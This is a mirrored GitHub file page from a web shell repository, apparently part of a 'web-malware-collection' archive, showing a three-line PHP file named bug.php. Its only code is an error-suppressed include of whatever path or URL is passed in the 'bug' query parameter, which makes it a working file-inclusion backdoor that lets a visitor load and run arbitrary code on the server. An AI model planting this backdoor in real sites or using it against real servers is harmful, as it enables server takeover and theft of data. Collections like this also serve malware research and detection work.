1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/web-malware-collection-13-06-2012/PHP/bug.php
2013-06-05 12:08:30 +08:00

3 lines
32 B
PHP

<?php
@include($_GET['bug']);
?>